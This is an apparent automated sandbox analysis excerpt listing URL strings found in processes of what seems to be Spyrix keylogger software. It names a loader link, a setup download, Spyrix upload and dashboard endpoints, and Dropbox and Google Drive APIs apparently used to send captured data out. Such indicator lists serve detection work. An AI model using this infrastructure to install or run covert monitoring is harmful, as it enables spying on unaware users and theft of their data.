            Source: 404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.000000000215E000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033FF000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.spyrix.com/
            Source: spkl.exeString found in binary or memory: http://www.spyrix.com/manual.php#registrate
            Source: spkl.exe, 00000033.00000002.3201106110.00000000009EA000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.0000000004591000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.spyrix.com/osticket/upload/open.php
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.spyrix.com/pro_upgrade.htm?lic=
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.spyrix.com/purchase.php
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.spyrix.com/terms-of-use.php)
            Source: spkl.exe, 00000033.00000002.3201106110.0000000000915000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2965463976.00000000044CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.spyrix.net/ibann
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/auth
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/token
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api-content.dropbox.com/1/chunked_upload
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api-content.dropbox.com/1/chunked_upload?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api-content.dropbox.com/1/commit_chunked_upload
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api-content.dropbox.com/1/files/dropbox
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api-content.dropbox.com/1/files/sandbox
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api-content.dropbox.com/1/files_put
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api-content.dropbox.com/1/files_put?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/account/info
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/account/info?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/delta
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/delta?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/fileops/copy
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/fileops/copy?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/fileops/create_folder
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/fileops/create_folder?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/fileops/delete
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/fileops/delete?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/fileops/move
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/fileops/move?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/metadata/dropbox
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/metadata/sandbox
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/oauth/access_token
            Source: spkl.exeString found in binary or memory: https://api.dropbox.com/1/oauth/access_token?
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/oauth/access_token?SV
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/oauth/request_token
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/oauth/request_token?
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/shares/dropbox
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.dropbox.com/1/shares/sandbox
            Source: 404.tmp, 0000000D.00000003.2999750559.000000000330B000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.cdndownload.net/proxy/list.json
            Source: curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk
            Source: cmd.exe, 00000004.00000003.1442867022.0000000002D24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk#
            Source: curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk$
            Source: curl.exe, 00000009.00000002.1457904714.0000000002BA4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1457615010.0000000002BA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk5
            Source: cmd.exe, 00000004.00000003.1458085591.0000000002D24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfk=
            Source: curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkE=E
            Source: cmd.exe, 00000004.00000003.1442867022.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457776016.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
            Source: curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkZ
            Source: cmd.exe, 00000004.00000003.1442867022.0000000002D1D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457776016.00000000027F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
            Source: curl.exe, 00000009.00000003.1457700688.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1457841190.0000000002B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkd
            Source: curl.exe, 00000009.00000002.1457841190.0000000002B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnbaynet.com/loader/link.php?prg_id=sfkurlrc
            Source: spkl.exe, 00000033.00000002.3256791035.0000000007C91000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.00000000018B5000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.00000000018F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
            Source: qrl.exe, 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000000.3111598222.000000000058A000.00000008.00000001.01000000.00000018.sdmpString found in binary or memory: https://curl.haxx.se/P
            Source: qrl.exe, 00000041.00000002.3100942894.000000000058A000.00000008.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000000.3111598222.000000000058A000.00000008.00000001.01000000.00000018.sdmpString found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
            Source: qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
            Source: qrl.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
            Source: qrl.exe, qrl.exe, 00000041.00000000.3072355052.00000000004C2000.00000002.00000001.01000000.00000018.sdmp, qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://curl.haxx.se/docs/sslcerts.html
            Source: qrl.exeString found in binary or memory: https://curl.haxx.se/docs/sslcerts.htmlcurl
            Source: qrl.exe, 00000045.00000002.3125634657.00000000004C2000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://curl.haxx.se/libcurl/c/curl_easy_setopt.html
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.actualkeylogger.com
            Source: spkl.exeString found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-program
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.actualkeylogger.com/account/login-from-programspsMapspsJSON
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.clevercontrol.com/account/user-hash-gen
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com
            Source: spkl.exe, 00000033.00000002.3256791035.0000000007C25000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.00000000018C2000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3256791035.0000000007C30000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3256791035.0000000007CC5000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.00000000044E6000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3254442560.00000000075FE000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3256791035.0000000007C91000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3231347372.00000000018F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/
            Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/.com/
            Source: spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/.spyrix.com/
            Source: spkl.exe, 00000033.00000002.3244401024.00000000044E6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/1
            Source: spkl.exe, 00000033.00000002.3250270127.000000000653A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/6s
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/account/login-from-program
            Source: 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/account/login-from-program?email=
            Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/olUsage
            Source: spkl.exe, 00000033.00000002.3247512604.0000000004BA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dashboard.spyrix.com/x.com/
            Source: 404.exe, 00000000.00000002.1648823536.0000000002692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filedn.com
            Source: 404.exe, 00000000.00000002.1648823536.000000000266E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
            Source: 404.exe, 00000000.00000002.1648823536.000000000266E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s148
            Source: 404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.000000000215E000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.00000000032CE000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step1
            Source: 404.exe, 0000000C.00000003.1711461284.0000000002370000.00000004.00001000.00020000.00000000.sdmp, 404.exe, 0000000C.00000003.3020973710.000000000215E000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3003306994.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.00000000032CE000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.1714710707.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step18
            Source: 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.app/manual/kaspersky-loader/step2
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000002.3247512604.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/Uwas771wvshs7916gjqg62417/core.php
            Source: spkl.exe, 00000033.00000003.3148880064.00000000001E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/das
            Source: 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/dashboard/av
            Source: spkl.exe, 00000033.00000002.3256791035.0000000007CC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/dashboard/prg-
            Source: spkl.exe, 00000033.00000003.3162106405.0000000007C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/dashboard/prg-actio
            Source: qrl.exeString found in binary or memory: https://spyrix.net/dashboard/prg-actions
            Source: qrl.exe, 00000041.00000002.3109418320.0000000001180000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000041.00000002.3108663163.0000000001080000.00000004.00000020.00020000.00000000.sdmp, qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/dashboard/prg-actionsC:
            Source: qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/dashboard/prg-actions_
            Source: qrl.exe, 00000041.00000002.3110605698.0000000001570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/dashboard/prg-actionssfk/sfk
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/dashboard/proxy/upload
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/rand.zip
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/usr/monitor/
            Source: 404.tmp, 0000000D.00000003.2999750559.000000000330B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/usr/monitor/access.txt
            Source: 404.tmp, 0000000D.00000003.2999750559.0000000003247000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/usr/monitor/iorder.php?comp_id=
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3244401024.000000000457B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://spyrix.net/usr/monitor/iupload.php
            Source: cmd.exe, 0000003C.00000002.3002253080.0000000002BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.sp
            Source: 404.tmp, 0000000D.00000003.2999009380.00000000053D5000.00000004.00000020.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3006986146.00000000053E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spy
            Source: WMIC.exe, 00000011.00000002.1757964117.000000000296E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyr
            Source: WMIC.exe, 00000015.00000002.1767737692.0000000002E2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-s
            Source: WMIC.exe, 00000015.00000002.1767737692.0000000002DF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setu
            Source: qrl.exeString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
            Source: timeout.exe, 0000003B.00000002.3053677227.00000000005D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe(
            Source: 404.tmp, 0000000D.00000002.3015844137.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe.
            Source: reg.exe, 00000019.00000002.1770050165.000001F3DECF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe6
            Source: 404.tmp, 0000000D.00000002.3018349690.0000000002180000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000002.3233766456.00000000031F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=
            Source: WMIC.exe, 00000011.00000002.1757964117.000000000296E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C
            Source: qrl.exe, 00000045.00000002.3127213030.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
            Source: regedit.exe, 00000030.00000002.2946808699.0000000000C50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=ffkFp&
            Source: wscript.exe, 00000034.00000002.2963843262.00000000032F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeR
            Source: curl.exe, 0000000A.00000002.1709007892.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1709050873.0000000002FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
            Source: curl.exe, 0000000A.00000002.1709007892.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1709050873.0000000002FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
            Source: WMIC.exe, 00000015.00000002.1767737692.0000000002DF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exej
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/CPS0
            Source: 404.tmp, 0000000D.00000003.1714710707.00000000032E1000.00000004.00001000.00020000.00000000.sdmp, 404.tmp, 0000000D.00000003.3001193671.00000000033D5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/repository.0
            Source: spkl.exeString found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/1/oauth/authorize?oauth_token=open
            Source: curl.exe, 0000000A.00000003.1708738377.0000000002FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/drive
            Source: spkl.exe, spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
            Source: spkl.exeString found in binary or memory: https://www.googleapis.com/auth/userinfo.prof
            Source: spkl.exe, 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, spkl.exe, 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.profile
